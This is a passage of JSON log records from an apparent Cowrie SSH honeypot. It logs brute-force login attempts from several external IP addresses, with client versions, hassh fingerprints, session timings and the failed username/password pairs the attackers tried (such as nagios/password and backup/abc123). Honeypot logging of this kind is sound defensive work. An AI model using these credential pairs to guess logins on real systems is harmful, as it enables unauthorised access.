ha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:40:29.124139Z","src_ip":"212.227.125.160","session":"f287333026c9"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123123","message":"login attempt [webmaster/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:40:29.809880Z","src_ip":"212.227.125.160","session":"f287333026c9"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:40:30.998373Z","src_ip":"212.227.125.160","session":"f287333026c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53950,"dst_ip":"1.2.3.4","dst_port":22,"session":"f970739ac090","protocol":"ssh","message":"New connection: 212.227.125.160:53950 (1.2.3.4:22) [session: f970739ac090]","sensor":"my-vps","timestamp":"2025-08-28T12:41:12.685082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:41:12.726979Z","src_ip":"212.227.125.160","session":"f970739ac090"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:41:12.857979Z","src_ip":"212.227.125.160","session":"f970739ac090"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"111111","message":"login attempt [webmaster/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:41:13.550576Z","src_ip":"212.227.125.160","session":"f970739ac090"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:41:14.833982Z","src_ip":"212.227.125.160","session":"f970739ac090"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42576,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b459e34e970","protocol":"ssh","message":"New connection: 212.227.125.160:42576 (1.2.3.4:22) [session: 5b459e34e970]","sensor":"my-vps","timestamp":"2025-08-28T12:41:52.403595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:41:52.404495Z","src_ip":"212.227.125.160","session":"5b459e34e970"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:41:52.578252Z","src_ip":"212.227.125.160","session":"5b459e34e970"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"1234567","message":"login attempt [webmaster/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:41:53.219460Z","src_ip":"212.227.125.160","session":"5b459e34e970"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:41:54.395008Z","src_ip":"212.227.125.160","session":"5b459e34e970"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47460,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ee7b5bd195f","protocol":"ssh","message":"New connection: 212.227.125.160:47460 (1.2.3.4:22) [session: 5ee7b5bd195f]","sensor":"my-vps","timestamp":"2025-08-28T12:42:32.137314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:42:32.270502Z","src_ip":"212.227.125.160","session":"5ee7b5bd195f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:42:32.336108Z","src_ip":"212.227.125.160","session":"5ee7b5bd195f"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"123456","message":"login attempt [nagios/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:42:32.991689Z","src_ip":"212.227.125.160","session":"5ee7b5bd195f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:42:34.163265Z","src_ip":"212.227.125.160","session":"5ee7b5bd195f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39462,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c30ce2b30a0","protocol":"ssh","message":"New connection: 212.227.235.229:39462 (1.2.3.4:22) [session: 7c30ce2b30a0]","sensor":"my-vps","timestamp":"2025-08-28T12:42:35.303567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:42:35.304589Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:42:35.432424Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1","message":"login attempt [backup/1] failed","sensor":"my-vps","timestamp":"2025-08-28T12:42:36.046915Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc123","message":"login attempt [backup/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:42:37.178003Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abcd123","message":"login attempt [backup/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:42:38.309233Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abcd1234","message":"login attempt [backup/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:42:39.439434Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc1234","message":"login attempt [backup/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:42:40.570943Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:42:41.701680Z","src_ip":"212.227.235.229","session":"7c30ce2b30a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58780,"dst_ip":"1.2.3.4","dst_port":22,"session":"bad7c12a5f55","protocol":"ssh","message":"New connection: 212.227.125.160:58780 (1.2.3.4:22) [session: bad7c12a5f55]","sensor":"my-vps","timestamp":"2025-08-28T12:43:10.283718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:43:10.284784Z","src_ip":"212.227.125.160","session":"bad7c12a5f55"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:43:10.448652Z","src_ip":"212.227.125.160","session":"bad7c12a5f55"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password","message":"login attempt [nagios/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:10.956315Z","src_ip":"212.227.125.160","session":"bad7c12a5f55"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:43:12.122857Z","src_ip":"212.227.125.160","session":"bad7c12a5f55"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":22505,"dst_ip":"1.2.3.4","dst_port":22,"session":"76c783981812","protocol":"ssh","message":"New connection: 80.94.95.112:22505 (1.2.3.4:22) [session: 76c783981812]","sensor":"my-vps","timestamp":"2025-08-28T12:43:25.067664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:43:25.068713Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:43:25.099622Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.login.failed","username":"admin","password":"777vlad","message":"login attempt [admin/777vlad] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:25.302570Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6767","message":"login attempt [admin/6767] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:26.334979Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.login.failed","username":"admin","password":"6565","message":"login attempt [admin/6565] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:27.368106Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.login.failed","username":"admin","password":"500500","message":"login attempt [admin/500500] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:28.400375Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.login.failed","username":"admin","password":"369852147","message":"login attempt [admin/369852147] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:29.432756Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:43:30.466085Z","src_ip":"80.94.95.112","session":"76c783981812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"a78c71d40e54","protocol":"ssh","message":"New connection: 212.227.125.160:6101 (1.2.3.4:22) [session: a78c71d40e54]","sensor":"my-vps","timestamp":"2025-08-28T12:43:41.435813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T12:43:41.795052Z","src_ip":"212.227.125.160","session":"a78c71d40e54"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T12:43:42.164521Z","src_ip":"212.227.125.160","session":"a78c71d40e54"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T12:43:45.852862Z","src_ip":"212.227.125.160","session":"a78c71d40e54"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:43:45.855216Z","src_ip":"212.227.125.160","session":"a78c71d40e54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39156,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e31642ac064","protocol":"ssh","message":"New connection: 212.227.125.160:39156 (1.2.3.4:22) [session: 4e31642ac064]","sensor":"my-vps","timestamp":"2025-08-28T12:43:48.909761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:43:48.992913Z","src_ip":"212.227.125.160","session":"4e31642ac064"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:43:49.123286Z","src_ip":"212.227.125.160","session":"4e31642ac064"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"123456789","message":"login attempt [nagios/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:43:49.802732Z","src_ip":"212.227.125.160","session":"4e31642ac064"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:43:50.985044Z","src_ip":"212.227.125.160","session":"4e31642ac064"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":27019,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc94f28e611d","protocol":"ssh","message":"New connection: 186.225.142.90:27019 (1.2.3.4:22) [session: fc94f28e611d]","sensor":"my-vps","timestamp":"2025-08-28T12:44:17.463226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:44:17.732495Z","src_ip":"186.225.142.90","session":"fc94f28e611d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp25